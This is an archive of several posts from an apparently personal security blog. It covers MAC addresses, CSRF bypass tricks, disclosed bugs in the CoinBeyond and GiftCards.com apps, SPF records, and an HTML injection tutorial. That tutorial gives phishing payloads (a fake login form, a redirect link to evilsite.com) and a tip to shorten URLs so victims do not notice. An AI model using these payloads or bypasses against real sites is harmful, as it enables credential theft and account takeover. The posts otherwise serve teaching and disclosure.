<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOYim5uxOQUD2MCfou1twuXnX4kKyFCd8R-xxBmsaI3WSnjcHIaakH6sAJkrFDnpRY7zfhPpqYJQBYjwQDEi09UcNrCkNMB41aQGHHOPVFxdF4X9y9ujJI11m2CLllyB0RK1RDH08Coi4/s1600/image.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="138" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOYim5uxOQUD2MCfou1twuXnX4kKyFCd8R-xxBmsaI3WSnjcHIaakH6sAJkrFDnpRY7zfhPpqYJQBYjwQDEi09UcNrCkNMB41aQGHHOPVFxdF4X9y9ujJI11m2CLllyB0RK1RDH08Coi4/s320/image.jpg" width="320" /></a></div>
<b><br /></b>
<b><br /></b>
<b><br /></b>
<br />
<h2 style="text-align: left;">
<b>What is a MAC address</b></h2>
<div>
<b>MAC address stands for Media Access Control.</b></div>
<div>
<b>Each network card has a physical static address assigned by the card manufacturer called MAC address.</b></div>
<div>
<b>The MAC address is used between the devices to identify each other and to transfer packet to the right place.</b></div>
<div>
<b>Each packet has a source MAC and a destination MAC address.</b></div>
<div>
<b><br /></b></div>
<div>
<b>This address is also known as the hardware addresses. They uniquely identify the adapter on LAN.</b></div>
<div>
<b>The MAC address are 12 bit hexadecimal number. It is written in the following format.</b></div>
<div>
<b><br /></b></div>
<div>
<b><i>MM:MM:MM:SS:SS:SS</i></b></div>
<div>
<b><i><br /></i></b></div>
<div>
<b>The first half of the MAC (24 bit) contains the ID number of adapter Manufacturer.</b></div>
<div>
<b>The second half (24 MORE BITS) of a MAC address represents the serial number assigned to the adapter by the manufacturer.</b></div>
<div>
<br /></div>
<h3 style="text-align: left;">
<b>How to find your MAC address</b></h3>
<div style="text-align: left;">
<ul style="text-align: left;">
<li><b>On Windows: Open the command prompt and enter the following command </b></li>
</ul>
<b><i><u>ipconfig /all </u></i></b></div>
<div style="text-align: left;">
here is the image </div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://uit.stanford.edu/sites/default/files/images/2010/01/11/address.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="160" src="https://uit.stanford.edu/sites/default/files/images/2010/01/11/address.gif" width="320" /></a></div>
<div style="text-align: left;">
<br /></div>
<div>
<ul style="text-align: left;">
<li><b>On linux: Open the terminal and give the following command </b></li>
</ul>
<b><i><u>ifconfig -a </u></i></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://wiki.csn.tu-chemnitz.de/_media/en/anleitung/ubuntu-macaddr-eng.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="204" src="https://wiki.csn.tu-chemnitz.de/_media/en/anleitung/ubuntu-macaddr-eng.png" width="320" /></a></div>
<div>
<b><i><u><br /></u></i></b></div>
<div>
<b><br /></b></div>
<div>
<b>IF you want to find who is the manufacturer of you network card then using the following ways retrieve the MAC address of the network card.</b></div>
<div>
<b><br /></b></div>
<div>
<b>Go to this <a href="http://aruljohn.com/mac.pl" rel="nofollow" target="_blank">address </a>. Now paste the first six digit of you mac address and click on Lookup.</b></div>
<div>
<b>IT will show you the maufacturer.</b></div>
<div>
<b>lets take an example.</b></div>
<div>
<b>In the above image of Ubuntu the MAC address is 08:00:27:62:bf:e1.</b></div>
<div>
<b>Now paste the first six digit of this on the given box like this 080027.</b></div>
<div>
<b><br /></b></div>
<div>
<b>Now it will show you the vendor of the card.</b></div>
<div>
<b><br /></b></div>
<div>
<b>Hope you enjoyed it more is coming soon.</b></div>
<div>
<b><br /></b></div>
<div>
<b>Thanks</b></div>
<div>
<b>Jitendra K Singh (Team Computer Korner)</b></div>
<div>
<br />
<b>Feel Free To Leave A Comment</b>
<b>If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You!</b></div>
<center>
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input name="cmd" type="hidden" value="_donations" /> <input name="business" type="hidden" value="ssutradhar35@gmail.com" /> <input name="lc" type="hidden" value="IN" /> <input name="item_name" type="hidden" value="Computer Korner" /> <input name="no_note" type="hidden" value="0" /> <input name="currency_code" type="hidden" value="USD" /> <input name="bn" type="hidden" value="PP-DonationsBF:btn_donateCC_LG.gif:NonHostedGuest" /> <input alt="PayPal — The safer, easier way to pay online." border="0" name="submit" src="https://www.paypalobjects.com/en_GB/i/btn/btn_donateCC_LG.gif" type="image" /> <img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1" /> </form>
</center>
</div>
Jitendrahttp://www.blogger.com/profile/12006899852837970196noreply@blogger.com0tag:blogger.com,1999:blog-5302093523789144315.post-91477742462297049202016-05-16T00:38:00.002+05:302016-05-16T00:38:18.747+05:30Bypassing the weak CSRF Protection<div dir="ltr" style="text-align: left;" trbidi="on">
<b>Hi there,</b><br />
<b><br /></b>
<b>So in InfoSec community everybody knows about the CSRF vulnerability.</b><br />
<b>And if the website is not using the CSRF protection they are lucky to find the Full account takeover using the CSRF.</b><br />
<b><br /></b>
<b>However many of Security Researcher only look if there is a CSRF token present on a particular request or not. And if it was not they think that this particular request is vulnerable to CSRF.</b><br />
<b><br /></b>
<h3 style="text-align: left;">
<b>Protection which Modern WebApp uses against CSRF</b></h3>
<div>
<b>So there are many protection which modern WebApp use against CSRF.</b></div>
<div>
<b><br /></b></div>
<div>
<b>1. Send an Authenticity token which each request:- So this is the basic protection which most of WebApp use. They send a Authenticity token with each request to protect their users against CSRF.</b></div>
<div>
<b><br /></b></div>
<div>
<b>2. X-CSRF Token:- Many Webapp use this extra layer of protection by adding a X-CSRF token header with each request the token in the header is verified on every request sent to server.</b></div>
<div>
<b>3. Referrer Header Protection:- You can only find this type of CSRF protection in some of the WebApp like Twitter. In this type of protection they verify the referrer header and if the referrer header is coming from any other domain besides the domain of the Website. It drops the request and shows an error.</b></div>
<div>
<b><br /></b></div>
<div>
<b><br /></b></div>
<h3 style="text-align: left;">
<b>Some Methods to Bypass the CSRF protection</b></h3>
<div>
<b>There are some methods which you can use to bypass the csrf protection</b></div>
<div>
<b><br /></b></div>
<div>
<b>1. There are many webapp which only verifies the length of the CSRF token which means create an account on that website and note down the length of the CSRF token. Now SEnd any arbitrary CSRF token of the same length and it will get accepted.</b></div>
<div>
<b><br /></b></div>
<div>
<b>2. You can also use GET method instead of POST method to bypass CSRF protection.</b></div>
<div>
<b><br /></b></div>
<div>
<b>3. There is missing best practice in many of the website. After logging in they generate a CSRF token for us and this token remains same on every request until we do logout. But if we note down the same token and try a CSRF attack on any other persons account it will be successful.</b></div>
<div>
<b>So from my opinion CSRF token should have to be unique per use and they have to expire after use does the logout.</b></div>
<div>
<b><br /></b></div>
<div>
<b>4. There is also a flaw exists which makes many Webapp vulnerable which generates the CSRF token and then save them to cookie and on each and every request they verifies the token in the POST request with the token in the cookie.</b></div>
<div>
<b>So it is easy to bypass this type of protection just change both token one which is inside the cookie and the other which is sent to the server on every request. And the request will be successful.</b></div>
<div>
<b>SO to mitigation you dont have to just match the token with the token in the cookie.</b></div>
<div>
<b><br /></b></div>
<div>
<b>Suggestion are welcome</b></div>
<div>
<b><br /></b></div>
<div>
<b><br /></b></div>
<div>
<b>Thanks </b></div>
<h3 style="text-align: left;">
<b>Jitendra K Singh(Team Computer Korner)</b></h3>
<b><br /></b>
<b>Feel Free To Leave A Comment</b>
<b>If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You!</b><br />
<center>
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input name="cmd" type="hidden" value="_donations" /> <input name="business" type="hidden" value="ssutradhar35@gmail.com" /> <input name="lc" type="hidden" value="IN" /> <input name="item_name" type="hidden" value="Computer Korner" /> <input name="no_note" type="hidden" value="0" /> <input name="currency_code" type="hidden" value="USD" /> <input name="bn" type="hidden" value="PP-DonationsBF:btn_donateCC_LG.gif:NonHostedGuest" /> <input alt="PayPal — The safer, easier way to pay online." border="0" name="submit" src="https://www.paypalobjects.com/en_GB/i/btn/btn_donateCC_LG.gif" type="image" /> <img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1" /> </form>
</center>
</div>
Jitendrahttp://www.blogger.com/profile/12006899852837970196noreply@blogger.com0tag:blogger.com,1999:blog-5302093523789144315.post-79985272818525755702016-05-11T09:00:00.000+05:302017-01-30T20:25:36.644+05:30CoinBeyond Bug: Account Lockout Never occurs<div dir="ltr" style="text-align: left;" trbidi="on">
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://encrypted-tbn3.gstatic.com/images?q=tbn:ANd9GcTlVPm8EEm2p_v1jRXAc0B9zts0DDMQVFra5X9tplirN3kGaDf6" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://encrypted-tbn3.gstatic.com/images?q=tbn:ANd9GcTlVPm8EEm2p_v1jRXAc0B9zts0DDMQVFra5X9tplirN3kGaDf6" /></a></div>
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b>Hi,</b><br />
<b><br /></b>
<b>I was not working from last few weeks but since I have some old bugs to share which I have found about 8 months ago and worked ethically by reporting them to the team but they are not care to reply on them as well as well I also contacted them on Twitter and they ignored my tweet.</b><br />
<b>Since It has been more than 8 months since I reported these bugs to them I started disclosing them.</b><br />
<b><br /></b>
<b>This Bug is about there account lockout functionality.</b><br />
<b>After signin into our account from there Android app there is an option where you can set a 4 digit Pin.</b><br />
<b>You have to enter this Pin every time you reopen the app after closing it. It is a very good functionality which can prevent intruders from accessing your account even them have got physical access to your device.</b><br />
<b>There are many feature in the mobile app which WebApp lacks.</b><br />
<b>So let suppose someone knew your credentials but since there is a PIN on your devices he can logout from the app. Because in order to logout he should have to know the right PIN to access the logout feature.</b><br />
<b>Now How does this functionality works.</b><br />
<b>You can't logout from the app without entering the pin because doing logout and relogin again will disable the PIN code safety measure. </b><br />
<b>If you tried entering the PIN more then 5 times then it will show that you account is locked for 30 minutes.</b><br />
<b><br /></b>
<br />
<h3 style="text-align: left;">
<b>Now Exploiting.</b></h3>
<div>
<b>So as I explained in order to disable the PIN you have to do logout so enter the wrong PIN 5 times It will automatically logs you out from the App and it will show a message like this </b><br />
<div class="separator" style="clear: both; text-align: center;">
<b><a href="https://hackerone-attachments.s3.amazonaws.com/production/000/050/727/996a45439353506da8a5949f75162dafeddd2e98/Screenshot_2015-08-22-21-41-20.png?AWSAccessKeyId=AKIAJFXIS7KJADBA4QQA&Expires=1462744140&Signature=D2IGYKHMebnVjpBAF0QLM9XJD18%3D" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://hackerone-attachments.s3.amazonaws.com/production/000/050/727/996a45439353506da8a5949f75162dafeddd2e98/Screenshot_2015-08-22-21-41-20.png?AWSAccessKeyId=AKIAJFXIS7KJADBA4QQA&Expires=1462744140&Signature=D2IGYKHMebnVjpBAF0QLM9XJD18%3D" width="180" /></a></b></div>
<b>
</b></div>
<b><br /></b>
<b>Now it says that the account is locked out for 30 minutes and it will automatically logs you out from the app. But the account lockout will never occurs </b><br />
<b>Now since you know the credentials you can use them to relogin and bypassing the PIN security measure since the Account lockout never occurred.</b><br />
<b><br /></b>
<b><br /></b>
<b>If you want to give your opinion on this bug feel free to comment.</b><br />
<b><br /></b>
<b>Thanks </b><br />
<b>Jitendra Santram Singh(Team Computer Korner) </b><br />
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b>Feel Free To Leave A Comment</b>
<b>If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You! </b>
<br />
<center>
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<div class="separator" style="clear: both; text-align: center;">
</div>
<input name="cmd" type="hidden" value="_donations" /> <input name="business" type="hidden" value="ssutradhar35@gmail.com" /> <input name="lc" type="hidden" value="IN" /> <input name="item_name" type="hidden" value="Computer Korner" /> <input name="no_note" type="hidden" value="0" /> <input name="currency_code" type="hidden" value="USD" /> <input name="bn" type="hidden" value="PP-DonationsBF:btn_donateCC_LG.gif:NonHostedGuest" /> <input alt="PayPal — The safer, easier way to pay online." border="0" name="submit" src="https://www.paypalobjects.com/en_GB/i/btn/btn_donateCC_LG.gif" type="image" /> <img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1" /> </form>
</center>
</div>
Jitendrahttp://www.blogger.com/profile/12006899852837970196noreply@blogger.com0tag:blogger.com,1999:blog-5302093523789144315.post-83177715844721275312016-04-26T20:00:00.000+05:302017-01-22T23:17:52.313+05:30The Story of the CoinBeyond Bug<div dir="ltr" style="text-align: left;" trbidi="on">
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://encrypted-tbn3.gstatic.com/images?q=tbn:ANd9GcTlVPm8EEm2p_v1jRXAc0B9zts0DDMQVFra5X9tplirN3kGaDf6" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://encrypted-tbn3.gstatic.com/images?q=tbn:ANd9GcTlVPm8EEm2p_v1jRXAc0B9zts0DDMQVFra5X9tplirN3kGaDf6" /></a></div>
<b><br /></b>
<b><br /></b>
<b><br /></b>
<b>Hi there,</b><br />
<b><br /></b>
<b>So this is the story about a bug on CoinBeyond.com.</b><br />
CoinBeyond provides a future-ready payment platform for Point-of-Sale and eCommerce. They make cutting-edge payment technology adoption simple for busy merchants so they can accept more ways to pay and provide their customers a modern multi-channel checkout experience.<br />
<br />
<h3 style="text-align: left;">
The Bug</h3>
<div>
So I was testing their Android App. First of all I tried to login to my account. I was checking for any rate limiting on the user login panel on Android App.</div>
<div>
So basically there login panel looks like and I Entered my Email in it </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhPmCi-6I7UA_gjqWAJ1onF-KhovCOmgkwAOgM06dlutK7Er_D1_ZwcD8r1uVcIJGYlzvzuSDmne-vwseDSpa68PSYdsMtlhxZ14cNcbph1OV3J5woYAygHelgHu_8ZapRCLiybderNu0/s1600/screen1+%25281%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhPmCi-6I7UA_gjqWAJ1onF-KhovCOmgkwAOgM06dlutK7Er_D1_ZwcD8r1uVcIJGYlzvzuSDmne-vwseDSpa68PSYdsMtlhxZ14cNcbph1OV3J5woYAygHelgHu_8ZapRCLiybderNu0/s320/screen1+%25281%2529.png" width="180" /></a></div>
<div>
<br /></div>
<b><br /></b>
<b>I am entering wrong password for login and it took me to another page </b><br />
<b>which looks likes this </b><br />
<div class="separator" style="clear: both; text-align: center;">
<b><a href="https://hackerone-attachments.s3.amazonaws.com/production/000/050/657/172dd5b2560282e55451b90fc0f5f3716d1cd7ac/screen2.png?AWSAccessKeyId=AKIAJFXIS7KJADBA4QQA&Expires=1461525920&Signature=VEP6ArCve%2BmewgKRui41XIhuqs0%3D" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://hackerone-attachments.s3.amazonaws.com/production/000/050/657/172dd5b2560282e55451b90fc0f5f3716d1cd7ac/screen2.png?AWSAccessKeyId=AKIAJFXIS7KJADBA4QQA&Expires=1461525920&Signature=VEP6ArCve%2BmewgKRui41XIhuqs0%3D" width="180" /></a></b></div>
<br />
<b><br /></b>
<b><br /></b>
<b>But there is something weird here.</b><br />
<b>I entered my email which is jkspentester@**.in but on this page it is only showing<i> jkspentester</i></b><br />
<b><i>Jkspentester</i> was my username of that account to basically it is leaking the username which is associated with the email address entered in above steps.</b><br />
<b><br /></b>
<br />
<h4 style="text-align: left;">
<b>Steps To Reproduce</b></h4>
<div>
<ol style="text-align: left;">
<li><b>Open CoinBeyond Android App and enter your email</b></li>
<li><b>Now enter any wrong password and click on signin.</b></li>
<li><b>On the next page the username associated with the email id will be revealed.</b></li>
</ol>
<b>If you enters a email id which doesn't have an account to the website the whole email is returned on the next page.</b></div>
<div>
<b><br /></b></div>
<div>
<b>I reported this bug to CoinBeyond team and they said they will fix it but after 7 Months they are still not able to provide any ETA for fix + They are not replying me So I am disclosing this bug.</b></div>
<div>
<b>More bugs coming soon</b></div>
<div>
<b><br /></b></div>
<div>
<b><br /></b></div>
<div>
<b>Regards</b></div>
<div>
<b>Jitendra Singh(Team Computer-Korner)</b></div>
<b><br /></b>
<b>Feel Free To Leave A Comment</b>
<b>If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You! </b>
<br />
<center>
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input name="cmd" type="hidden" value="_donations" /> <input name="business" type="hidden" value="ssutradhar35@gmail.com" /> <input name="lc" type="hidden" value="IN" /> <input name="item_name" type="hidden" value="Computer Korner" /> <input name="no_note" type="hidden" value="0" /> <input name="currency_code" type="hidden" value="USD" /> <input name="bn" type="hidden" value="PP-DonationsBF:btn_donateCC_LG.gif:NonHostedGuest" /> <input alt="PayPal — The safer, easier way to pay online." border="0" name="submit" src="https://www.paypalobjects.com/en_GB/i/btn/btn_donateCC_LG.gif" type="image" /> <img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1" /> </form>
</center>
</div>
Jitendrahttp://www.blogger.com/profile/12006899852837970196noreply@blogger.com0tag:blogger.com,1999:blog-5302093523789144315.post-29828962904090837782016-04-17T23:27:00.001+05:302016-04-17T23:33:08.650+05:30Missing SPF record: Vulnerability Or Not ?<div dir="ltr" style="text-align: left;" trbidi="on">
<b><br /></b>
<b><br /></b>
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://www.yourhowto.net/wp-content/uploads/2013/08/email-620x556.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="286" src="https://www.yourhowto.net/wp-content/uploads/2013/08/email-620x556.jpg" width="320" /></a></div>
<b><br /></b>
<b>Hi Followers ,</b><br />
<b>First of all sorry for the delay in the new post.</b><br />
<b><br /></b>
<b>So this post is about SPF(Sender Policy Framework) record I am writing this post because many bug hunter thinks this a simple and common vulnerability. But as my perspective this is not a security issue at all.</b><br />
<b>Many security researchers who want to make easy money by doing bug hunting reports this first to any website which have a bug bounty program and in 1 or 2 hour there will be about 30-40 reports which are about the SPF records.</b><br />
<h3 style="text-align: left;">
<b>What are SPF records ?</b></h3>
<div>
<b>So basically Sender Policy Framework records are used when you want to allow some third party service to send emails on behalf of your domain. The purpose of adding these records to prevent malicious users from sending the forged email from your domain. </b></div>
<div>
<b><br /></b></div>
<div>
<b>But there is an exception only SPF records cant prevent malicious users from sending the email from your domain but you also have to add DMARC record. I have written a Post about this and you can find it <a href="http://www.computerkorner.org/2015/08/understanding-dmarc-record-why-it-is.html" rel="nofollow" target="_blank">Here</a>.</b></div>
<div>
<b><br /></b></div>
<div style="text-align: left;">
<b>The SPF record of a domain looks like this one </b></div>
<div style="text-align: left;">
v=spf1 include:_spf.google.com ~all </div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<b>Here there are two syntax of defining all one is </b></div>
<div style="text-align: left;">
<b>1. ~all: It is used for softfail</b></div>
<div style="text-align: left;">
<b>2. -all: It is used for hardfail</b></div>
<div>
<b><br /></b></div>
<div>
<b>So basically checking of SPF record is MTA in-exclusive if there is no SPF record it checks the MX record of the domain. As I also stated above that they are only necessary if you want to allow a third party service to send emails on behalf of your domain.</b></div>
<div>
<b><br /></b></div>
<div>
<b>And if you are not using any third party service then you don't have to add the SPF records.</b></div>
<div>
<b><br /></b></div>
<div>
<b>Missing SPF records doesn't pose a security risk at all. </b><br />
<b>However to prevent the spamming from a particular domain you also have to define the DMARC records.</b><br />
<b>DMARC records dictates the mail policy of any domain mainly if the DMARC records are added then you can say that the SPF records will have those domain which will be used for sending the emails on the behalf of that domain and if someone tries to spoof the email from a third party service which is not defined in the SPF record the mail will be rejected or will be marked as spam by the mail servers</b><br />
<b><br /></b>
<b><br /></b>
<b>Hope this post helped you. </b><br />
<b>If you have any suggestion that how can we make this blog more interesting or you have question about this post then feel free to comment.</b><br />
<b><br /></b>
<b><br /></b>
<b>Cheers</b><br />
<b>Jitendra (Team Computer Korner)</b><br />
<b><br /></b>
<b><br /></b></div>
<b>Feel Free To Leave A Comment</b>
<b>If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You! </b>
<br />
<center>
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input name="cmd" type="hidden" value="_donations" /> <input name="business" type="hidden" value="ssutradhar35@gmail.com" /> <input name="lc" type="hidden" value="IN" /> <input name="item_name" type="hidden" value="Computer Korner" /> <input name="no_note" type="hidden" value="0" /> <input name="currency_code" type="hidden" value="USD" /> <input name="bn" type="hidden" value="PP-DonationsBF:btn_donateCC_LG.gif:NonHostedGuest" /> <input alt="PayPal — The safer, easier way to pay online." border="0" name="submit" src="https://www.paypalobjects.com/en_GB/i/btn/btn_donateCC_LG.gif" type="image" /> <img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1" /> </form>
</center>
</div>
Jitendrahttp://www.blogger.com/profile/12006899852837970196noreply@blogger.com0tag:blogger.com,1999:blog-5302093523789144315.post-35207350310015202932016-03-29T10:00:00.000+05:302016-03-29T10:00:18.142+05:30WebApp Pentesting:What is HTML Injection <div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.lomaymi.com/wp-content/uploads/2012/04/HTML-Injection.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://www.lomaymi.com/wp-content/uploads/2012/04/HTML-Injection.png" height="186" width="320" /></a></div>
<b><br /></b>
<b>Hi Everyone </b><br />
<b><br /></b>
<b>So In this post we will talk about HTML injection.</b><br />
<b><br /></b>
<b>HTML injection is similar to Cross Site Scripting (XSS) attack. But in XSS we insert malicious Script Tags to run JavaScript but in HTML injection we use HTML tag in order to modify the page for malicious purposes.</b><br />
<b><br /></b>
<br />
<h3 style="text-align: left;">
<b>Why HTML injection Happens ?</b></h3>
<div>
<b>When an application does not properly handle user supplied data, an attacker can supply valid HTML, typically via a parameter value, and inject their own content into the page.</b></div>
<div>
<b><br /></b></div>
<div style="text-align: left;">
So to demonstrate this I have hosted a vulnerable webpage on http://htmli.comlu.com/html.php<br />
When you visit to this page you can see that on that webpage it says<br />
Hi Mr Thanks for looking here<br />
Now you can give a parameter to this by just adding ?name=ANY_HTML_VAlue so the final url will be<br />
http://htmli.comlu.com/html.php?name=ANY_VALUE.<br />
<br />
lets try to exploit it.<br />
<br />
here first we will put some content in <b> tag<br />
use this url and you can see that some text is in dark black http://htmli.comlu.com/html.php?name=<b>html-injection</b><br />
<br />
<h4 style="text-align: left;">
Redirecting user to malicious site </h4>
<div>
http://htmli.comlu.com/html.php?name=<a href="evilsite.com">Click here to login</a></div>
<div>
<br /></div>
<h4 style="text-align: left;">
Creating a Fake login form</h4>
<div>
http://htmli.comlu.com/html.php?name=<form action="evilform.php" method="post"><input type="text" name="user" placeholder="username"></br><input type="password" name="pass" placeholder="pass"><!--</div>
<div>
I used comment tag in the last of the form so all other content of the form will be commented out and that will not be displayed on the page.</div>
</div>
<b><br /></b>
<h4>
Displaying a Fake Message</h4>
<div>
To display a fake message you can use this http://htmli.comlu.com/html.php?name=<p>we have changed our website login page please go to evilsite.com for login</p></div>
<div>
<br /></div>
<div>
<br /></div>
<b>So the question is if we send this url to a use he will get to know that we are doing an phishing attack on him.</b><br />
<b>So you can encode the url or you can shorten the url using any of the url short service like goo.gl</b><br />
<b><br /></b>
<b><br /></b>
<b>Thats All for this post </b><br />
<b>Hope you enjoyed it.</b><br />
<b><br /></b>
<b>Suggestion are welcome. Please do comment below for your feedback.</b><br />
<b><br /></b>
<b><br /></b>
<b>Thanks</b><br />
<b>Jitendra Kumar Singh(Team Computer Korner)</b><br />
<b> </b>
<b><br /></b>
<b>Feel Free To Leave A Comment</b>
<b>If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You! </b>
<br />
<center>
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input name="cmd" type="hidden" value="_donations" /> <input name="business" type="hidden" value="ssutradhar35@gmail.com" /> <input name="lc" type="hidden" value="IN" /> <input name="item_name" type="hidden" value="Computer Korner" /> <input name="no_note" type="hidden" value="0" /> <input name="currency_code" type="hidden" value="USD" /> <input name="bn" type="hidden" value="PP-DonationsBF:btn_donateCC_LG.gif:NonHostedGuest" /> <input alt="PayPal — The safer, easier way to pay online." border="0" name="submit" src="https://www.paypalobjects.com/en_GB/i/btn/btn_donateCC_LG.gif" type="image" /> <img alt="" border="0" height="1" src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1" /> </form>
</center>
</div>
Jitendrahttp://www.blogger.com/profile/12006899852837970196noreply@blogger.com0tag:blogger.com,1999:blog-5302093523789144315.post-50498520791459693782016-03-27T23:53:00.001+05:302016-03-27T23:53:10.970+05:30Bypassing Four digit Pin lock Of GiftCards.com Mobile App<div dir="ltr" style="text-align: left;" trbidi="on">
<b><br /></b>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://e870cfe4b60e0ee059e6-255af679d99329b12de7149087702e5c.ssl.cf2.rackcdn.com/logos/GiftCards_800@2x.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://e870cfe4b60e0ee059e6-255af679d99329b12de7149087702e5c.ssl.cf2.rackcdn.com/logos/GiftCards_800@2x.png" /></a></div>
<b><br /></b>
<b><br /></b>
<b>Hi Everyone,</b><br />
<b><br /></b>
<b>This post is about a simple vulnerability by Which I am able to bypass the 4 Digit Pin lock on GiftCards.com android app.</b><br />
<b><br /></b>
<h3 style="text-align: left;">
<b>Description </b></h3>
<div>
<b>So GiftCards.com android app let you set a 4 digit pin. This pin is secure your account from the intruders.Evertime you open the app , you have to enter the 4 digit pin in order to access the account.</b></div>
<div>
<b>And there is also rate limiting on place that if you try to brute force the pin it logs you out and then in order to access the account you have to sign in again.</b></div>
<div>
<b>But by a simple vulnerability I can bypass the 4 digit pin.</b></div>
<div>
<b><br /></b></div>
<h3 style="text-align: left;">
<b>How I am able to Bypass it</b></h3>
<div>
<b>So the exploit is very simple here.</b></div>
<div>
<b>You have to remember a things that after entering wrong pin 5 times it will log you out.</b></div>
<div>
<b>Now lets start since you have the physical access of the device.</b></div>
<div>
<b>Configure Burp to intercept all the traffic from you mobile device. Now open the app it will ask you for the password.</b></div>
<div>
<b><br /></b></div>
<div>
<b>When you open the app a request like this will pass through the burp </b></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiGPe7GM2Ycat0s2J4sDl6yYSFvuU63VxV3Zkdk-K52rgiwNkF_n3XKzlz98EpfSTo3oOm0k1ZmuwcuTur06SQM_m4lqDzlMoyFl3_QqmfZp3n9TqUAZ6WmEi2K21lFYqGsdm6Edt31zM/s1600/giftcards.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiGPe7GM2Ycat0s2J4sDl6yYSFvuU63VxV3Zkdk-K52rgiwNkF_n3XKzlz98EpfSTo3oOm0k1ZmuwcuTur06SQM_m4lqDzlMoyFl3_QqmfZp3n9TqUAZ6WmEi2K21lFYqGsdm6Edt31zM/s320/giftcards.png" width="320" /></a></div>
<div>
<b><br /></b></div>
<div>
<b>The pin is not entered at this time.</b></div>
<div>
<b><br /></b></div>
<div>
<b>Now enter the wrong pin since as i mentioned you have 5 chances to enter the pin.</b></div>
<div>
<b>so if you enter a wrong pin.</b></div>
<div>
<b>You will see a response like this </b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgisQqvw46oohaKzfrUip3LOz3LCZFTocXFJLFrU09Lm7LodFhbIEghK-YdVqmKiGaLXeyzA2Z-8peWzh0UCxUaFFQEHiLAXB8soXccSsSS-eqvzqCaONgs611ApI5d-4jrjb6iIncQheI/s1600/giftcards1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgisQqvw46oohaKzfrUip3LOz3LCZFTocXFJLFrU09Lm7LodFhbIEghK-YdVqmKiGaLXeyzA2Z-8peWzh0UCxUaFFQEHiLAXB8soXccSsSS-eqvzqCaONgs611ApI5d-4jrjb6iIncQheI/s320/giftcards1.png" width="320" /></a></div>
<div>
<b><br /></b></div>
<b><br /></b>
<b>You Can easily see that the pin is mentioned in the response.</b><br />
I can easily bypass the 4 digit pin countermeasure and can access the private info like credit card info , Gift cards purchased and many other things.<br />
<br />
P.S: My device is not rooted and I never perform tests on a rooted device. Since rooting a device removes the most important security feature of the android.<br />
<br />
Hope you enjoyed it let me know your thinking about this in comments.<br />
<br />
Reported to Giftcards.com security team on January 19 2016<br />
No response from the team.<br />
Disclosed on March 27 2016<br />
<br />
Thanks<br />
Jitendra Kumar Singh (Team Computer- Korner)<br />
<br />
<br />
<b>Feel Free To Leave A Comment</b>
<b>If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You! </b>
<br />
<center>
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
